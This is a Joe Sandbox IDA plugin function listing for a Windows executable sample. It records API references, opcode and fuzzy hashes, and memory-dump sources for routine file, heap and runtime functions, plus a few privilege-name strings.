API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
Instruction ID: 228d9a63ce32fb5005f21b6989da466d9e56013889344d292b9874871f7e4771
Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
Instruction Fuzzy Hash: 80518F22A08A8691FF60EF25D44677DA365FF84B84F840137EA8E076A5CFBCD441C362

Function 00007FF7E1DC1794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC187D

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
Instruction ID: 61363a1312a4247c1fb4d423c89556b2d358192c95590c45f1ec7f37fa73ad2a
Opcode Fuzzy Hash: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
Instruction Fuzzy Hash: 5041D862B18A9191EB14EA17AA4137AE251FF84FC0F848536EE5C47F5ADFBCD4918340

Function 00007FF7E1DC2F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC30C8

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
Instruction ID: 1b4d33f63a48ed8b112408b67d4d7dc52477ffa8c0d277c98077a26a9a5fd5d4
Opcode Fuzzy Hash: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
Instruction Fuzzy Hash: 54412323A08B0680EF14EF29E147379A361EB84BD8F940536EA4D07799CFBCE440C7A1

Function 00007FF7E1DEBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7E1DEBE20

Part of subcall function 00007FF7E1DEBFB0: GetModuleHandleExW.KERNEL32 ref: 00007FF7E1DEBFD0
Part of subcall function 00007FF7E1DEBFB0: GetProcAddress.KERNEL32 ref: 00007FF7E1DEBFE6
Part of subcall function 00007FF7E1DEBFB0: FreeLibrary.KERNEL32 ref: 00007FF7E1DEC00B

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction ID: e51c3a9a47bc08eb024c7693ea98ac8b5fb565ca5f67740278f73f0bbd001dd4
Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction Fuzzy Hash: DB41C722F1860286FB18FB149452378A251BF54B42FC58477DA4D87695CFFDF881C7A2

Function 00007FF7E1DB129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DB1396

Part of subcall function 00007FF7E1DB1F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E1DB1F89

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: ae4aa31824b7da0d77a8f4b9fb7a8218d847e075a5624bc92285f3cd7a959bae
Instruction ID: 7c7b98aa523ca16a125ae0297751da8b4bacc6b36e513bddce4badd1629feaf7
Opcode Fuzzy Hash: ae4aa31824b7da0d77a8f4b9fb7a8218d847e075a5624bc92285f3cd7a959bae
Instruction Fuzzy Hash: 4421A122A09251A5EB14EA51B442779A250FB04BF0FA80B32DE3E47BC1EEBCE4518312

Function 00007FF7E1DF124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DF1280

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction ID: 6855c9024a0566e65ee1bf30b1c71a4961cda4e00508572303daae31dfd0c871
Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction Fuzzy Hash: 98117F76E1C64286E710EB90A4837B9F2A4FB44380FD54136E68D87699DFBCE520C762

Function 00007FF7E1DB3AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB3B6C

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
Instruction ID: b201d88b203d2996845660393533347d66834bd04dced6e3b8be98cfea522c4c
Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
Instruction Fuzzy Hash: 1B010462E1878591EB15E728E44272DB361FF89790FC04232E69D07BA9DFBCE0408705

Function 00007FF7E1DE1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DE1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF7E1DE1573,?,?,?,00007FF7E1DE192A), ref: 00007FF7E1DE162B

DloadProtectSection.DELAYIMP ref: 00007FF7E1DE15C9

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction ID: 9623c738a3a367721ff1aa0bc4bb6c30195e2822d0892750f821d21054995164
Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction Fuzzy Hash: 1B11EC60F0850781FB64FB04A843770A360AF1834AF9550B7D94D862A5EEBCB5D5C663

Function 00007FF7E1DEFA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7E1DEFA59

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction ID: 9d29412a639496145bd48ae8ec49049bcd98580090604e9f69a159fd7f63268e
Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction Fuzzy Hash: 77F04F51F1A20745FF5CFA6195133F692805F44B42FC89432C90ECA3C1EDBCA6814232

Function 00007FF7E1DC3EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC40BC: FindFirstFileW.KERNELBASE ref: 00007FF7E1DC410B
Part of subcall function 00007FF7E1DC40BC: FindFirstFileW.KERNELBASE ref: 00007FF7E1DC415E
Part of subcall function 00007FF7E1DC40BC: GetLastError.KERNEL32 ref: 00007FF7E1DC41AF

FindClose.KERNELBASE(?,?,00000000,00007FF7E1DD0811), ref: 00007FF7E1DC3EFD

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction ID: b53f90ff91d3639c293b383453f10217cccd87a810dbd10120280b963a618b7a
Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction Fuzzy Hash: 5AF0D16250828281EB10FB74A0023A8B360DB09BB4F541736EA7D073C7CEB8D484C7A6

Function 00007FF7E1DED94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7E1DED98A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: 7d75b2558e818aaea9074527b49714fd36c16f7843404505ea2bf7a6c58e8630
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: 1BF05E11F09A0744FF18FA715C0337892915F44762FC8A632DD6EC62C1DEBCA4808233

Function 00007FF7E1DC20D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF7E1DC207E), ref: 00007FF7E1DC20F6

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: b76c82a88ef40f0a88a7131b349639d1f9fd92c44a004cbd612311bbf6226e18
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: 14F0C222A0868295FB24DB30E042379A771EB94B78F894336E73D011D8CFB8D895C362

Function 00007FF7E1DC273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF7E1DC2755

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
Instruction ID: 9f08bb4b5b3b6d1015975652aa0b013f91aee998ab8fea41ebf61ccce588bc19
Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
Instruction Fuzzy Hash: EAE08611B1051582EF20FB26C8477245320AF8CF85B841032CE0C07365CF78D4A1CA51

Function 00007FF7E1DC2490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF7E1DC24A2

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: f4f833e972e7ca37306a4646ed5ee30f716e78424486199f2fdf76a701f4b8cd
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: 8BD0C711D09451C3DA10E635985213C93505F95735FE40731D53D815D1CA6D95959262

Function 00007FF7E1DC7FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF7E1DC7FD2

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction ID: b01b901965ba8b24c2609a14bb53dd46d2af819782d945cc98c7cce4bea3a5d1
Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction Fuzzy Hash: 47C08C21F05503C1DB08AB26C8CA21813A4FB54B04BE08036C10C81120CE3CC5FAA397

Non-executed Functions

Function 00007FF7E1DBC2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DBDE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E1DBCF4B), ref: 00007FF7E1DBDE27
Part of subcall function 00007FF7E1DBDE04: GetLastError.KERNEL32 ref: 00007FF7E1DBDE88
Part of subcall function 00007FF7E1DBDE04: CloseHandle.KERNEL32 ref: 00007FF7E1DBDE9B

wcscpy.LIBCMT ref: 00007FF7E1DBCBC8
wcscpy.LIBCMT ref: 00007FF7E1DBCBFE
CreateFileW.KERNEL32 ref: 00007FF7E1DBCC38
DeviceIoControl.KERNEL32 ref: 00007FF7E1DBCD01
CloseHandle.KERNEL32 ref: 00007FF7E1DBCD12
GetLastError.KERNEL32 ref: 00007FF7E1DBCD2E
RemoveDirectoryW.KERNEL32 ref: 00007FF7E1DBCD7D
DeleteFileW.KERNEL32 ref: 00007FF7E1DBCD88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCE89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCE8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCE9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCEA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCEAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCEB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCEB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCEBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCEC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCECB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBCED7

Strings

SeRestorePrivilege, xrefs: 00007FF7E1DBC343
UNC\, xrefs: 00007FF7E1DBC53F, 00007FF7E1DBC55D
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF7E1DBC34F
\??\, xrefs: 00007FF7E1DBC392, 00007FF7E1DBC3B8

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2659423929-3508440684
Opcode ID: 133043678a36d966ba880c912d6856c5696a7c6c433e50d223eb52f27bd95b56
Instruction ID: a3483be71d97dc2f5199992e6d622ad3f14e55c2af7120869d1dbf3d773cc58c
Opcode Fuzzy Hash: 133043678a36d966ba880c912d6856c5696a7c6c433e50d223eb52f27bd95b56
Instruction Fuzzy Hash: 3D62D062F0864295FB00EB74D4467ADA361BB857A4FD04233DA6E53AD9DFBCE184C311

Function 00007FF7E1DCF180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF7E1DD0528

Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB67
Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB80

Part of subcall function 00007FF7E1DDB0DC: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00007FF7E1DD0429), ref: 00007FF7E1DDB110
Part of subcall function 00007FF7E1DDB0DC: SetLastError.KERNEL32 ref: 00007FF7E1DDB153

Part of subcall function 00007FF7E1DB129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DB1396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD0490
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD0496
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD049C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD04A8
